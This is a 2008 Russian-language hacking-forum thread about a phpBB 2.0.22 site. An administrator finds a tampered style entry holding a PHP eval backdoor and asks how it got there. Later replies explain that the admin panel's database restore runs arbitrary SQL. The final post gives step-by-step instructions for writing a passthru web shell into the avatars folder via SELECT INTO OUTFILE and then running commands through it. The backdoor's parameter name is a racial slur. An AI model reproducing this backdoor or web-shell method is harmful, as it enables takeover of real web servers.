Сломать phpbb через стили

Discussion in 'Песочница' started by cow, 21 Feb 2008.

  1. cow

    cow New Member

    Joined:
    11 Apr 2006
    Messages:
    22
    Likes Received:
    0
    Reputations:
    -1
    Стоит пхпбб 2.0.22. Щас в стилях обнаружил мною не до конца удаленный стиль, но уже кем то обработанный:

    Style: FI
    Template: aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tmp

    Что это, попытка или уже состовшийся взлом? Я думаю попытка ибо этот код вроде нигде не будет выполняться. Было ли это сделано через акк админа или тут поработали SQL иньекциями? Всем спасибо за версии.
     
  2. cow

    cow New Member

    Joined:
    11 Apr 2006
    Messages:
    22
    Likes Received:
    0
    Reputations:
    -1
    Ещё раз в потверждении моей версии, что код выполняться не будет.

    Phpbb работает с этой строчкой не более как с именем файла. Но по прежнему интересует каким образом это значение забито, через ак админа вроде так не сделаешь, значит добрались до базы?
     
  3. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,324
    Likes Received:
    1,193
    Reputations:
    252
    Попытка...попробуй выставить этот стиль и изменить немного адрес, добавив ?nigga=phpinfo();
     
  4. cow

    cow New Member

    Joined:
    11 Apr 2006
    Messages:
    22
    Likes Received:
    0
    Reputations:
    -1
    Проверил на всякий - но ничего, тоже самое. Через ак админа такую тему реально было замутить? Я просто догадываюсь кто меня ломает, там ломаки сидят - максимум пароль админа сбрутят. Но через админку template_сonfig_file вроде ни как не изменишь?? Да и про SQL иньекции в админке я так же не слышал. Поэтому не могу понять как это злоумышленнику удалось?!
     
    #4 cow, 21 Feb 2008
    Last edited: 21 Feb 2008
  5. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    в админке можно выполнить любые скл запросы посредством "восстановление бд"

    создаешь файлик 1.sql и пишешь в нем любые запросы, потом грузишь и они выполнились

    внимательнее читай прикрепленный топ про пхпбб

     
    3 people like this.
  6. cow

    cow New Member

    Joined:
    11 Apr 2006
    Messages:
    22
    Likes Received:
    0
    Reputations:
    -1
    Спасибо. Вот что выдал форум

    Я так понимаю на 2.0.22 бага не актуальна?
     
  7. ~!DoK_tOR!~

    ~!DoK_tOR!~ Banned

    Joined:
    10 Nov 2006
    Messages:
    673
    Likes Received:
    357
    Reputations:
    44
    1. Идём в админку и делаем полную копию базы данных .
    2. Теперь нам нужно узнать установочную директорию форума
    смотри тут https://forum.antichat.ru/threadnav24488-1-10.html
    а теперь правим базу находим такую строку:

    PHP:
    INSERT INTO phpbb_categories (cat_idcat_titlecat_orderVALUES('1''test''10');
    PHP:
    INSERT INTO phpbb_categories (cat_id, cat_title, cat_order) VALUES('1', '<? passthru("$cmd"); ?>', '10');
    SELECT cat_title INTO OUTFILE '/тут_твой_путь_до_форума/images/avatars/shell.php' FROM phpbb_categories where cat_id=1; 
    UPDATE phpbb_categories SET cat_title='test'WHERE cat_id=1;
    восстанавливаем базу

    http://site.com/phpBB/images/avatars/shell.php?cmd=ls - тут твой шелл
     
    #7 ~!DoK_tOR!~, 24 Apr 2008
    Last edited: 24 Apr 2008
    1 person likes this.